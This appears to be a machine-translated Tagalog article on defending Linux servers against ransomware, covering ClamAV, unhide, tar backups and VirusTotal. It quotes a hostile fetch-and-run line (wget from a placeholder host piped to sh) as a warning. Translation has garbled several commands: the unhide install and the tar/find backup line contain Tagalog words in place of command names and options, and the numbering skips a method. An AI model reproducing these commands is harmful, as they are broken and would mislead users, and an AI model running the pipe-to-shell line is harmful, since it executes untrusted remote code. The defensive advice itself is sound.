Ang Ransomware ay isa sa mga mas nagbabantang problema sa mundo ng seguridad sa network ngayon. Nakakatakot isipin na maaaring may mag-hostage ng iyong data. Ang ilang impeksyon ng ransomware ay naka-encrypt ang lahat ng data sa isang partikular na dami, at ang mga indibidwal sa likod nito ay humihiling ng isang tiyak na halaga ng pera bago sila sumang-ayon na palabasin ang susi na kinakailangan upang ma-unlock ang nasabing data. Lalo na patungkol ito para sa mga taong may napakaraming pera na namuhunan sa kanilang data. Mayroong kaunting magandang balita para sa mga gumagamit ng Linux, gayunpaman.
Sa ilalim ng karamihan sa mga sitwasyon, mahirap para sa ransomware code na makakuha ng kontrol sa anumang higit pa sa direktoryo sa bahay ng isang gumagamit. Ang mga program na ito ay walang mga pahintulot na magtapon ng buong pag-install. Ito ang dahilan kung bakit ang Linux ransomware ay higit na isang problema sa mga server kung saan palaging may root access ang mga operator. Ang Ransomware ay hindi dapat maging isang isyu para sa mga gumagamit ng Linux, at maraming mga hakbang na gagawin upang maiwasang mangyari sa iyo.
Paraan 1: Pagtatanggol Laban sa BashCrypt-style Attacks
Ang BasyCrypt ay isang patunay ng piraso ng konsepto ng ransomware na nagpatunay na posible na mahawahan ang mga istruktura ng server sa ganitong uri ng nakakahamak na code. Nagbibigay ito ng isang baseline para sa kung ano ang maaaring hitsura ng mga pakete ng ransomware ng Linux. Habang sila ay hindi pangkaraniwan, ang magkatulad na uri ng mga hakbang sa pag-iwas sa sentido para sa mga tagapangasiwa ng server ng iba pang mga platform ay gumagana rin dito. Ang problema ay sa mga kapaligiran sa antas ng enterprise maaaring mayroong isang malaking bilang ng mga iba't ibang mga tao na gumagamit ng isang host system.
Kung nagpapatakbo ka ng isang server ng mail, napakahirap na pigilan ang mga tao na gumawa ng mga kalokohan. Gawin ang iyong makakaya upang paalalahanan ang lahat na huwag buksan ang mga kalakip na hindi nila sigurado, at palaging i-scan ng malware ang lahat ng pinag-uusapan. Ang isa pang bagay na makakatulong talaga upang maiwasan ang mga ganitong uri ng pag-atake ay mula sa panonood kung paano mo mai-install ang mga binary na may wget. Naturally ang iyong mail server ay marahil ay kulang sa isang kapaligiran sa desktop nang sama-sama at malamang na gumagamit ka ng wget, apt-get, yum o pacman upang pamahalaan ang darating na mga package. Napakahalaga na panoorin kung anong mga repository ang ginagamit sa mga pag-install na ito. Minsan makikita mo ang isang utos na nais mong magpatupad ng isang bagay tulad ng wget http: //www.thisisaprettybadcoderepo.webs/ -O- | sh, o maaaring nasa loob ng isang shell script. Sa alinmang paraan, huwag patakbuhin ito kung hindi mo alam kung para saan ang lalagyan na iyon.
Paraan 2: Pag-install ng isang Scanner Package
Mayroong maraming mga piraso ng teknolohiyang pag-scan ng open source na malware. Ang ClamAV ay ang pinakatanyag, at maaari mo itong mai-install sa maraming apt-based na pamamahagi sa pamamagitan ng paggamit ng:
sudo apt-get install clamav
Kapag na-install ito, dapat ipaliwanag ng tao clamav ang paggamit sa payak na wika. Tandaan na habang maaari nitong i-scan at alisin ang mga nahawaang file, hindi talaga nito maaalis ang nakakahawang code mula sa isang file. Ito ay isang sitwasyon sa lahat o wala.
Mayroong pangalawang scanner na maaaring hindi mo pamilyar, ngunit kapaki-pakinabang kung ang mga nakatagong proseso ang nakakatakot sa iyo. Muli kung gumagamit ka ng isang apt-based na pamamahagi, pagkatapos ay i-isyu ang utos na ito upang mai-install ang hindi naganap na scanner:
sudo apt-get install nang hindi naganap
Kapag na-install na ito, i-type ang:
sudo unhide sys
Gagawa ito ng isang buong pag-scan ng iyong system para sa anumang mga nakatagong proseso.
Paraan 4: Pagpapanatiling Malinis na Mga Pag-back up sa Kamay
Bagaman hindi ito dapat maging isang isyu dahil ang lahat ay dapat palaging gumawa ng mga pag-backup, ang pagkakaroon ng mahusay na pag-backup ay maaaring agad na mag-zap ransomware. Ano ang napakaliit na ransomware doon sa platform ng Linux ay may kaugaliang pag-atake ng mga file na may mga extension na tukoy sa mga platform ng pag-unlad ng Web. Nangangahulugan ito kung mayroon kang isang toneladang .php, .xml o .js code na nakaupo, partikular mong gugustuhing i-back up ito. Isaalang-alang ang sumusunod na linya ng code:
tar -cf backups.tar $ (hanapin -pangalan ng '* .ruby' -o -pangalan ng '* .html')
Dapat itong lumikha ng isang malaking file ng archive ng tape ng bawat file na may .ruby at .html na mga extension sa loob ng isang istraktura ng file. Pagkatapos ay maililipat ito sa ibang pansamantalang subdirektoryo para sa bunutan upang matiyak na gumagana nang maayos ang paglikha nito.
Ang tape archive na ito ay maaari at dapat ilipat sa isang panlabas na dami. Maaari mong syempre gumamit ng .bz2, .gz o .xv compression bago gawin ito. Maaari mong hilingin na lumikha ng mga naka-mirror na backup sa pamamagitan ng pagkopya nito sa dalawang magkakaibang dami.
Paraan 5: Paggamit ng Mga Web-based na Mga Scanner
Marahil ay na-download mo ang isang RPM o DEB na pakete mula sa isang site na nangangako na maglalaman ng kapaki-pakinabang na software. Ang software ay ipinamamahagi rin sa pamamagitan ng 7z o naka-compress na mga tar file din. Ang mga gumagamit ng mobile ay maaari ring makatanggap ng mga Android packages sa format na APK. Madaling i-scan ang mga ito gamit ang isang tool mismo sa iyong browser. Ituro ito sa https://www.virustotal.com/, at sa sandaling ang pag-load ng pahina ay pindutin ang pindutang 'Piliin ang File'. Bago ka mag-upload, tandaan na ito ay isang pampublikong server. Bagama't ligtas ito at pinapatakbo ng Alphabet Inc, naglilipat ito ng publiko sa mga file, na maaaring isang isyu sa ilang mga super-secure na kapaligiran. Limitado din ito sa 128 MB na mga file.
Piliin ang iyong file sa kahon na darating at piliin ang bukas. Ang pangalan ng file ay lilitaw sa linya sa tabi ng pindutan pagkatapos na mawala ang kahon.
Mag-click sa malaking asul na 'I-scan ito!' pindutan Makakakita ka ng isa pang kahon na nagsasaad na ina-upload ng system ang iyong file.
Kung may nag-check na muna ng file nang una, aabisuhan ka nito ng nakaraang ulat. Kinikilala ito batay sa isang halaga ng SHA256, na gumagana sa parehong paraan tulad ng parehong mga tool sa linya ng utos ng Linux na nakasanayan mo. Kung hindi, magpapatakbo ito ng isang buong pag-scan na may 53 magkakaibang mga programa sa pag-scan. Ang ilan sa kanila ay maaaring mawalan ng oras kapag naipatakbo ang file, at ang mga resulta ay maaaring ligtas na balewalain.
Ang ilang mga programa ay maaaring magbalik ng iba't ibang mga resulta kaysa sa iba, kaya madaling alisin ang maling mga positibo sa sistemang ito. Ang pinakamagandang bahagi ay gumagana ito sa pagitan ng iba't ibang mga platform, na ginagawang pantay itong kaakit-akit anuman ang aling pamamahagi mayroon ka sa iba't ibang mga aparato. Gumagawa din ito nang maayos mula sa mga pamamahagi ng mobile tulad ng Android, na muling dahilan kung bakit ito ay isang mahusay na paraan upang siyasatin ang mga pakete ng APK bago gamitin ang mga ito.
Basahin ang 4 na minuto
